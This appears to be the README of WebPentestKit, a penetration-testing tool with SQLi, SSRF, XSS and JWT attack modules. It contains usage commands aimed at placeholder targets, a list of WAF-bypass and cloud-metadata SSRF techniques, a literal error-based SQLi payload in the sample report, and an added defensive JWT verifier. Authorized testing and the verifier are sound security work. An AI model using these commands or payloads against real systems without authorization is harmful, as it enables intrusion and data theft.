Modular Web Application Penetration Testing Framework
SQLi · SSRF · XSS · JWT — four powerful modules, one command-line tool.
⚠️ For authorized systems only. This tool is intended for educational purposes and legal penetration testing.
| Module | Techniques | Targets |
|---|---|---|
| `sqli` | Error-based, Blind Boolean, Time-based | MySQL, MSSQL, Oracle, PostgreSQL |
| `ssrf` | Cloud metadata, Internal network, Protocol attacks, Callback listener | AWS/GCP/Azure, internal networks |
| `xss` | Context-aware payload generation, WAF bypass, Polyglot | Cloudflare, ModSecurity, Akamai |
| `jwt` | alg:none, RS256→HS256 confusion, kid injection, JWKS spoofing | Any JWT-validating endpoint |
```bash
git clone https://github.com/ozancolhak/WebPentestKit
cd WebPentestKit
pip install -r requirements.txt
```

```bash
# Full scan with all techniques
python3 webpentestkit.py sqli -u "http://target.com/page?id=1" -p id --dbms mysql
# Time-based only, save JSON report
python3 webpentestkit.py sqli -u "http://target.com/item?id=5" -p id -t time -o report.json
# Multi-threaded blind scan
python3 webpentestkit.py sqli -u "http://target.com/user?uid=3" -p uid -t blind --threads 10
```

Supported techniques: error · blind · time · all
```bash
# Cloud metadata + internal network scan
python3 webpentestkit.py ssrf -u "http://target.com/fetch?url=x" -p url
# With local callback listener (out-of-band detection)
python3 webpentestkit.py ssrf -u "http://target.com/fetch?url=x" -p url \
    --listen --port 8888 --callback "http://YOUR_IP:8888"
# Cloud payloads only
python3 webpentestkit.py ssrf -u "http://target.com/proxy?target=x" -p target \
    --payloads cloud -o ssrf_report.json
```

Payload categories: AWS · GCP · Azure · Internal (RFC1918) · Protocol attacks (file://, dict://, gopher://) · IP encoding bypass (Octal, Hex, Decimal, IPv6)
```bash
# Generate Cloudflare bypass payloads
python3 webpentestkit.py xss --generate --waf cloudflare --context html -o payloads.txt
# Scan a target (context auto-detected)
python3 webpentestkit.py xss --scan -u "http://target.com/search?q=test" -p q
# Generate all contexts with ModSecurity bypass
python3 webpentestkit.py xss --generate --waf modsec --context all -o all_payloads.txt
```

WAF profiles: cloudflare · modsec · akamai · generic

Contexts: html · js · attr · all
```bash
# Analyze token and run all attacks
python3 webpentestkit.py jwt -t "eyJ..." --attack all --url http://target.com/api/profile
# alg:none bypass
python3 webpentestkit.py jwt -t "eyJ..." --attack none --url http://target.com/api/me
# RS256 → HS256 key confusion
python3 webpentestkit.py jwt -t "eyJ..." --attack rs2hs --key public.pem \
    --url http://target.com/api/admin
# kid injection (SQLi / Path Traversal)
python3 webpentestkit.py jwt -t "eyJ..." --attack kid --url http://target.com/api/data
```

Attack types:

| Type | Description |
|---|---|
| `none` | alg:none/None/NONE/nOnE variants |
| `rs2hs` | Uses public key as HS256 secret |
| `kid` | SQLi and path traversal via kid header |
| `jwks` | jku/x5u/x5c header vulnerability analysis |
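
A verifier that rejects each of the four attack types listed above, as an added example that is not part of WebPentestKit. It pins HS256 to stay within the Python standard library (a service issuing RS256 tokens pins RS256 the same way); the key store `KEYS`, the key id `k1` and all function names are constructed for illustration.

```python
import base64, hashlib, hmac, json

PINNED_ALG = "HS256"                       # chosen by the server, never by the token
KEYS = {"k1": b"constructed-demo-secret"}  # constructed sample key, indexed by kid
KEY_SOURCE_HEADERS = {"jku", "jwk", "x5u", "x5c"}

class TokenRejected(Exception):
    """Raised for any token that fails a check."""

def b64d(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def make_token(header, claims, key=b""):
    """Build a sample token; signs with HMAC-SHA256 when a key is given."""
    body = ".".join(b64e(json.dumps(p).encode()) for p in (header, claims))
    sig = hmac.new(key, body.encode(), hashlib.sha256).digest() if key else b""
    return body + "." + b64e(sig)

def verify(token):
    try:
        h64, p64, s64 = token.split(".")
        header, sig = json.loads(b64d(h64)), b64d(s64)
    except ValueError as exc:
        raise TokenRejected("malformed token") from exc
    if not isinstance(header, dict):
        raise TokenRejected("malformed header")
    # Exact match against the pin: none/None/nOnE and RS256 all fail here.
    if header.get("alg") != PINNED_ALG:
        raise TokenRejected("algorithm not allowed")
    # Key material or key URLs supplied by the token are never trusted.
    if header.keys() & KEY_SOURCE_HEADERS:
        raise TokenRejected("token-supplied key source")
    # kid is only a dictionary key; it never reaches SQL or a file path.
    kid = header.get("kid")
    if not isinstance(kid, str) or kid not in KEYS:
        raise TokenRejected("unknown kid")
    expected = hmac.new(KEYS[kid], f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise TokenRejected("bad signature")
    return json.loads(b64d(p64))

if __name__ == "__main__":
    good = make_token({"alg": "HS256", "kid": "k1"}, {"sub": "alice"}, KEYS["k1"])
    print(verify(good))
```
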
Every module supports `--output report.json` for structured JSON reports:

```json
{
  "tool": "WebPentestKit",
  "total_findings": 2,
  "findings": [
    {
      "module": "SQLi",
      "severity": "CRITICAL",
      "title": "Error-based SQLi (mysql)",
      "detail": "Parameter 'id' is vulnerable to error-based SQLi.",
      "evidence": {
        "payload": "' AND extractvalue(1,concat(0x7e,(SELECT version())))--",
        "pattern": "you have an error in your sql syntax"
      }
    }
  ]
}
```

Severity levels: CRITICAL → HIGH → MEDIUM → LOW → INFO